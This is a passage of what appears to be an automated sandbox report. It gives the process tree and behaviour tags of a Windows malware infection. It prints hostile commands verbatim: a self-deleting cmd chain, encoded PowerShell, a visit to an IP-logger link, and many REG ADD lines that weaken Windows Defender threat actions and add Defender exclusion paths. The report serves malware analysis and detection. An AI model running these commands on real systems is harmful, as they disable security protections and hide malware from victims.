C:\Users\Admin\Pictures\Adobe Films\MFPmIIhwR3njJSHvNPzgPYo6.exe"C:\Users\Admin\Pictures\Adobe Films\MFPmIIhwR3njJSHvNPzgPYo6.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\DzNmPWdwKQwiMdPEyWA0pWIZ.exe"C:\Users\Admin\Pictures\Adobe Films\DzNmPWdwKQwiMdPEyWA0pWIZ.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\93ca6fa8-9fe0-4132-baf8-6414ddbd5187.exe"C:\Users\Admin\AppData\Local\Temp\93ca6fa8-9fe0-4132-baf8-6414ddbd5187.exe"4⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\c8543649-03e9-461c-bb64-bc5598521773.exe"C:\Users\Admin\AppData\Local\Temp\c8543649-03e9-461c-bb64-bc5598521773.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 14285⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\PhK8unYY2mmDRFfEIEhrxgqj.exe"C:\Users\Admin\Pictures\Adobe Films\PhK8unYY2mmDRFfEIEhrxgqj.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\go-memexec-2546849896.exeC:\Users\Admin\AppData\Local\Temp\go-memexec-2546849896.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\T4GuP5xLZ5KygBfWzf7jpOvR.exe"C:\Users\Admin\Pictures\Adobe Films\T4GuP5xLZ5KygBfWzf7jpOvR.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\NROUveYetDLp89YeLjvoyKcP.exe"C:\Users\Admin\Pictures\Adobe Films\NROUveYetDLp89YeLjvoyKcP.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\Zh3M5OU4FZcI7PVNDwUeCUKJ.exe"C:\Users\Admin\Pictures\Adobe Films\Zh3M5OU4FZcI7PVNDwUeCUKJ.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\PDSIHzLf.cPl",4⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\PDSIHzLf.cPl",5⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\PDSIHzLf.cPl",6⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\PDSIHzLf.cPl",7⤵
- Loads dropped DLL
-
C:\Users\Admin\Pictures\Adobe Films\PSJX3kTgFrzS6xbKJXjbH2XR.exe"C:\Users\Admin\Pictures\Adobe Films\PSJX3kTgFrzS6xbKJXjbH2XR.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\UPLs6tY8WjwSKiXVW8fL8JqY.exe"C:\Users\Admin\Pictures\Adobe Films\UPLs6tY8WjwSKiXVW8fL8JqY.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2536 -s 13004⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\9hvXSXrdixXuUYtM4HT7kFel.exe"C:\Users\Admin\Pictures\Adobe Films\9hvXSXrdixXuUYtM4HT7kFel.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 9hvXSXrdixXuUYtM4HT7kFel.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\9hvXSXrdixXuUYtM4HT7kFel.exe" & del C:\ProgramData\*.dll & exit4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 9hvXSXrdixXuUYtM4HT7kFel.exe /f5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Pictures\Adobe Films\EJegy7njpw4NcGC4TPkpQFA9.exe"C:\Users\Admin\Pictures\Adobe Films\EJegy7njpw4NcGC4TPkpQFA9.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc YwBtAGQAIAAvAGMAIAB0AGkAbQBlAG8AdQB0ACAAMgAwAA==4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout 205⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 206⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3660 -s 20004⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\askinstall49.exe"C:\Users\Admin\AppData\Local\Temp\askinstall49.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1pbEa72⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2176,11823168568097411713,102048783089189035,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2176,11823168568097411713,102048783089189035,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:33⤵
-
C:\Users\Admin\AppData\Local\Temp\soft.exe"C:\Users\Admin\AppData\Local\Temp\soft.exe"2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffab2de46f8,0x7ffab2de4708,0x7ffab2de47181⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k wusvcs -p1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2616 -ip 26161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 4148 -ip 41481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4140 -ip 41401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4148 -ip 41481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 4148 -ip 41481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 2536 -ip 25361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4148 -ip 41481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5448 -ip 54481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3660 -ip 36601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 4148 -ip 41481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 4148 -ip 41481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\WOJEBgcpJeoAyOioJ\wwLMGvKHJFdcKei\JJujxgo.exeC:\Users\Admin\AppData\Local\Temp\WOJEBgcpJeoAyOioJ\wwLMGvKHJFdcKei\JJujxgo.exe j1 /site_id 525403 /S1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GuXKuCyCeSmjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GuXKuCyCeSmjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bQZEOuyekqRU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bQZEOuyekqRU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\lSmWvXKKfqUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\lSmWvXKKfqUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uAhcATovcXckvYCnvyR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uAhcATovcXckvYCnvyR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wjTkFrExU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wjTkFrExU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ZvEHJNdJDJxIeVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ZvEHJNdJDJxIeVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\WOJEBgcpJeoAyOioJ\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\WOJEBgcpJeoAyOioJ\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HvrIGoRDYaykjTnO\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HvrIGoRDYaykjTnO\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GuXKuCyCeSmjC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GuXKuCyCeSmjC" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GuXKuCyCeSmjC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bQZEOuyekqRU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bQZEOuyekqRU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lSmWvXKKfqUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lSmWvXKKfqUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uAhcATovcXckvYCnvyR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uAhcATovcXckvYCnvyR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wjTkFrExU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wjTkFrExU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ZvEHJNdJDJxIeVVB /t REG_DWORD /d 0 /reg:323⤵
-
